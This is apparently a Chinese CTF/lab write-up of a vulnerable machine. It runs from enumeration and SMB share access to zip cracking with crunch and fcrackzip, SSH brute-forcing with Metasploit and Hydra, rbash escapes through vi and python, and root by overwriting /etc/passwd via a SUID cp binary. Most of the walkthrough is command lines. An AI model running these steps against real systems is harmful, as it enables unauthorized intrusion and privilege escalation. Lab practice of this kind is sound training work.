信息收集
发现开放4个端口
Web
访问Web页面发现只有一个图片,没有得到其他有用信息
*爆破目录*
发现
robots.txt文件
*访问*robots.txt
得到五个地址,但依次访问后都为图片,没有有用信息
SMB
列出服务器所有共享目录(匿名访问)
发现靶机存在
LOCUS_LAN$共享和IPC$共享
*访问*IPC$共享****
无果
*访问*LOCUS_LAN$共享****
发现两个文件, 将它们分别下载到Kali上
解压
*尝试解压*msg_horda.zip文件****
unzip msg_horda.zip
解压失败,发现需要密码
*查看*SOS.txt
看到一串
[@%%,],结合crunch工具提示,猜测这是一个密码提示
生成字典
```
crunch 4 4 -t @%%, -o wordlist
@ 代表小写字母,% 代表数字,,代表大写字符, ^ 代表特殊符号
```
参数解释
字典
爆破压缩包密码
```
fcrackzip -D -p wordlist -u msg_horda.zip
-D 表示要使用字典破解
-p 表示要使用那个字典破解
```
参数解释
爆破成功,得到密码
r44M
利用此密码解压压缩包后得到
key.txt
得到一串密钥
SSH
题目:
根据上面得到的密码r44M,以及题目提示,对**SSH服务进行爆破
*解压密码文件*
gzip -d rockyou.txt.gz
*对SSH服务进行爆破*
*MSF:*
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.102.250
rhosts => 172.16.102.250
msf6 auxiliary(scanner/ssh/ssh_login) > set password 3_d4y
password => 3_d4y
msf6 auxiliary(scanner/ssh/ssh_login) > set threads 64
threads => 64
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /usr/share/wordlists/rockyou.txt
user_file => /usr/share/wordlists/rockyou.txt
*Hydra:*
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y -t 4 172.16.102.250 ssh
得到账号
marcus
*SSH连接服务器*
rbash绕过
vi 绕过
*进入vi编辑器*
*输入*:set shell=/bin/bash
*输入*:shell
输入
:shell后页面返回,再次切换目录,成功表明已绕过rbash权限
利用 python 逃逸
python -c 'import pty;pty.spawn("/bin/sh")'
python -c 'import os;os.system("/bin/sh")'
ssh 服务登录前逃逸
ssh [email protected] -t "bash --noprofile"
SUID提权
*查看以root权限运行的程序*
find / -perm -u=s 2>/dev/null
发现
cp命令
*修改*passwd文件提权****
先将/etc/passwd文件中所有信息复制到/tmp/passwd中
vim /etc/passwd
50yy # 复制50行
:q! # 推出vi编辑器
cd /tmp
vim passwd
p # 粘贴
*生成hash密码*
openssl passwd -1 -salt root 123456
*修改*passwd文件****
*使用*cp命令将/tmp/passwd拷贝到/etc/中****
*切换root用户,实现提权*
得到flag文件
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论